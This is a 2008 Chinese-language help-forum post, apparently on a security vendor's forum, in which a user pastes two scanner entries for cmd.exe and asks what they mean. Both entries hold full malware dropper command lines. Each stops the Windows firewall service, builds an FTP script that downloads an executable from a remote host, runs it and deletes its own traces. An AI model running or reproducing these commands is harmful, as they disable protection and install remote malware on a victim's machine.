╬預約離別 - 2008-8-23 10:13:00
进程名称: cmd.exe
分析: 安全
对应文件: C:\WINDOWS\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess&echo open 222.208.183.101>dboy.sys&echo admin>>dboy.sys&echo 123456>>dboy.sys&echo get guojig.exe C:\boots.exe>>dboy.sys&echo bye>>dboy.sys&echo ftp -s:dboy.sys>dboy.bat&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe&echo start start /high "" C:\WINDOWS\system32\inf\test.exe&echo start C:\boots.exe>>dboy.bat&echo start C:\boots.exe>>dboy.bat&echo del dboy.sys>>dboy.bat&echo del %0>>dboy.bat&dboy.bat
文件描述: Windows Command Processor
模块列表:
--------------------------------------------------------------------
进程名称: cmd.exe
分析: 安全
对应文件: C:\WINDOWS\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess&echo open ddosboy1.3322.org >dboy1.sys&echo dboy>>dboy1.sys&echo if>>dboy1.sys&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat&echo start C:\Windows\tcpsrv1.exe>>system1.bat&echo start C:\Windows\tcpsrv1.exe>>system1.bat&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat&system1.bat
文件描述: Windows Command Processor
模块列表:
请高手分析下这2个进程的命令行是什么意思? 在线等 谢谢了!
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA; TheWorld)
© 2000 - 2025 Rising Corp. Ltd.